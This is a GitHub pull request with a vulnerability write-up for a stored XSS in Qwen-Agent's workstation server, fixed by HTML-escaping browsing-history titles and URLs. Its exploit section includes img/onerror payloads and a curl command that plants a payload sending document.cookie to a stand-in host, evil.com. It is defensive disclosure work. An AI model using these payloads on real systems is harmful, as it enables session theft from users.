fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79) #846

Open
sebastiondev wants to merge 1 commit into QwenLM:main from sebastiondev:fix/cwe79-workstation_server
@sebastiondev
Vulnerability Summary

CWE-79: Stored Cross-Site Scripting (XSS) in qwen_server/workstation_server.py
Severity: High (stored XSS, no authentication required)

Data Flow

  1. Source: Attacker-controlled url and title values are written to meta_data.jsonl via:
    • database_server.cache_page() — unauthenticated POST to /endpoint (port 7866)
    • workstation_server.add_file() — Gradio file upload
  2. Sink: update_browser_list() (line ~162) interpolates these values directly into an HTML string using .format(), which is then rendered by Gradio's gr.HTML component.
  3. No sanitization existed between source and sink.

Additionally, get_basename_from_url() URL-decodes percent-encoded characters, so a URL like http://evil.com/%3Cimg%20src=x%20onerror=alert(1)%3E produces the title <img src=x onerror=alert(1)>.
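
The decoding step can be illustrated with a minimal sketch. The function `basename_from_url` below is a hypothetical stand-in written for this example, not the project's actual get_basename_from_url() implementation; it only assumes that the last path segment is percent-decoded with the standard library.

```python
from urllib.parse import unquote, urlsplit


def basename_from_url(url: str) -> str:
    """Hypothetical stand-in: return the percent-decoded last path segment."""
    path = urlsplit(url).path
    last_segment = path.rstrip("/").rsplit("/", 1)[-1]
    # unquote() turns %3C, %20 and %3E back into "<", " " and ">"
    return unquote(last_segment)


title = basename_from_url(
    "http://evil.com/%3Cimg%20src=x%20onerror=alert(1)%3E"
)
print(title)
```

The URL itself contains no HTML metacharacters, so filtering on the raw URL alone would not catch the payload; it only appears after decoding.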

Exploit Scenarios

Vector 1 — Chrome Extension (social engineering):

  1. Attacker hosts a page at a URL containing a percent-encoded XSS payload
  2. Victim visits the page and clicks "Add to Qwen's Reading List" (the Chrome extension)
  3. The extension sends the URL to database_server, which URL-decodes it into meta_data.jsonl
  4. When the victim opens the Workstation, the payload renders via gr.HTML → XSS fires

Vector 2 — Direct POST (network access required):

curl -X POST http://TARGET:7866/endpoint \
  -H "Content-Type: application/json" \
  -d '{"task":"cache","url":"<img src=x onerror=fetch(\"http://evil.com/steal?\"+document.cookie)>","content":"test"}'

Fix Description

Change: Added html.escape() calls for both url (with quote=True for attribute context) and title before HTML interpolation in update_browser_list().

Rationale:

  • html.escape() is the standard Python library function for neutralizing HTML metacharacters (<, >, &, ", ')
  • quote=True on the URL ensures the id="ck-..." and href="..." attribute contexts are also safe
  • The fix is minimal (1 new import, 3 changed lines) and does not alter any functional behavior
  • No dependencies are added

Diff: 1 file changed, 5 insertions, 2 deletions.
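
A minimal sketch of the escaping pattern described above. The template string and the `render_row` helper are assumptions made for illustration; the actual markup in update_browser_list() may differ.

```python
import html

# Hypothetical row template; the real one in workstation_server.py may differ.
ROW_TEMPLATE = (
    '<li><input type="checkbox" id="ck-{url}">'
    '<a href="{url}">{title}</a></li>'
)


def render_row(url: str, title: str) -> str:
    """Escape both values before interpolating them into the HTML string."""
    safe_url = html.escape(url, quote=True)  # used inside attribute values
    safe_title = html.escape(title)          # used as element text
    return ROW_TEMPLATE.format(url=safe_url, title=safe_title)


row = render_row(
    'http://a/"onmouseover="alert(1)',
    "<img src=x onerror=alert(1)>",
)
print(row)
```

With escaping applied, the double quote in the URL can no longer close the attribute and the title is emitted as text rather than as an element.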


Test Results Summary

The fix was verified by tracing the code path:

  • Before fix: x[0] and x[1] from meta_data.jsonl are interpolated directly into HTML → <img src=x onerror=alert(1)> renders as live HTML
  • After fix: html.escape(x[0], quote=True) and html.escape(x[1]) convert < to &lt;, > to &gt;, and " to &quot; → payload renders as inert text
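
The before/after behavior could also be checked mechanically instead of by tracing. The sketch below is an assumption about how such a check might look, not part of this PR: it parses both renderings with the standard library's HTMLParser and records which start tags are recognized. The row template is hypothetical.

```python
import html
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Record the name of every start tag the parser recognizes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def collect_tags(markup: str) -> list:
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


ROW = '<li><a href="{url}">{title}</a></li>'  # hypothetical template
payload = "<img src=x onerror=alert(1)>"
url = "http://example.com/"

raw_tags = collect_tags(ROW.format(url=url, title=payload))
escaped_tags = collect_tags(
    ROW.format(url=html.escape(url, quote=True), title=html.escape(payload))
)
print(raw_tags, escaped_tags)
```

An extra `img` tag in the unescaped rendering, and its absence in the escaped one, is the property the fix is meant to guarantee.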

Disprove Analysis

We systematically attempted to invalidate this finding:

| Check | Result |
| --- | --- |
| Authentication | ❌ None. The api_key is for DashScope (LLM backend), not for user auth. Neither the Gradio nor FastAPI server authenticates clients. |
| Network binding | ⚠️ Default 127.0.0.1, but 0.0.0.0 is documented and encouraged for multi-machine setups. Chrome extension path bypasses localhost restriction entirely. |
| CORS | ⚠️ Database server restricts CORS origins, but Chrome extensions and direct HTTP clients (curl) bypass CORS. |
| innerHTML script limitation | ⚠️ <script> tags don't execute via innerHTML per HTML5 spec, but event handlers (onerror, onload) DO execute. |
| Input validation | ❌ No sanitize, escape, validate, clean, or allowlist calls existed in the original code path. |
| Prior reports | Issue #810 reports the exact same XSS pattern in gradio_utils.py, confirming this is an acknowledged vulnerability class in the project. |
| Security policy | ❌ No SECURITY.md found. |
| Recent hardening | ❌ Only 2 commits on this file (original creation + this fix). No prior security work. |

Verdict: CONFIRMED VALID (high confidence)

No existing mitigation fully prevents exploitation. The Chrome extension attack vector bypasses both localhost binding and CORS restrictions, requires no special network access, and needs only a single click from the victim.


Known Limitations (for follow-up)

  1. javascript: URI scheme: html.escape() does not prevent javascript: URIs in the href attribute. A URL-scheme allowlist would be a stronger defense.
  2. Checkbox ID stability: After escaping, the id="ck-..." attribute uses the escaped URL, which may differ from the raw URL used elsewhere. This is a pre-existing design concern, not introduced by this fix.
  3. Related issue: #810 describes the same XSS pattern in qwen_agent/gui/gradio_utils.py — that file is not addressed by this PR.
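
For the first limitation, a URL-scheme allowlist might look like the sketch below. It is not part of this PR: the `ALLOWED_SCHEMES` set and the `has_allowed_scheme` helper are assumptions for illustration, and entries that are local file paths (for example from add_file()) would need separate handling because they carry no scheme.

```python
import html
from urllib.parse import urlsplit

# Assumption: only web links should become clickable hrefs.
ALLOWED_SCHEMES = {"http", "https"}


def has_allowed_scheme(url: str) -> bool:
    """Return True only if the URL's scheme is on the allowlist."""
    try:
        scheme = urlsplit(url.strip()).scheme.lower()
    except ValueError:
        # Malformed URLs are treated as not allowed.
        return False
    return scheme in ALLOWED_SCHEMES


# html.escape() leaves a javascript: URI untouched, so it needs a separate check.
unchanged = html.escape("javascript:alert(1)", quote=True)
print(unchanged, has_allowed_scheme(unchanged))
```

A caller could render the entry as plain text, without an href, whenever `has_allowed_scheme` returns False.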

…d XSS (CWE-79)

The update_browser_list() function interpolated title and url values from
meta_data.jsonl directly into an HTML string without escaping. An attacker
who controls a browsing entry title (via the browser extension or by writing
to the meta_data file) could inject arbitrary HTML/JavaScript into the
Gradio web UI.

Fix: apply html.escape() to both title and url before interpolation into
the HTML template string.